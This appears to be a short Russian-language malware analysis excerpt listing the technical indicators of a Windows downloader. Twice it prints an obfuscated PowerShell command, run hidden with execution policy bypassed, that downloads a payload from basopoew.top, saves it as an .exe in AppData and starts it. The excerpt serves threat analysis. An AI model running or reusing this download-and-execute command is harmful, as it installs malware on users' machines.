Техническая информация
- http://www.basopoew.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "powerSHElL.eXe -eXEcuTiONpOlICy ByPaSs -NOPrOfiLe -WiNdOWSTYlE hidDEn (new-OBjeCT sYStem.nET.WebcLIEnT).dOWNloaDfile('http://www.basopoew.top/read.php?f=1.gif','%apPdATA%.eXE');Start-p...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- DNS ASK ba###oew.top
- '<SYSTEM32>\cmd.exe' /c "powerSHElL.eXe -eXEcuTiONpOlICy ByPaSs -NOPrOfiLe -WiNdOWSTYlE hidDEn (new-OBjeCT sYStem.nET.WebcLIEnT).dOWNloaDfile('http://www.basopoew.top/read.php?f=1.gif','%apPdATA%.eXE');Start-p... (со скрытым окном)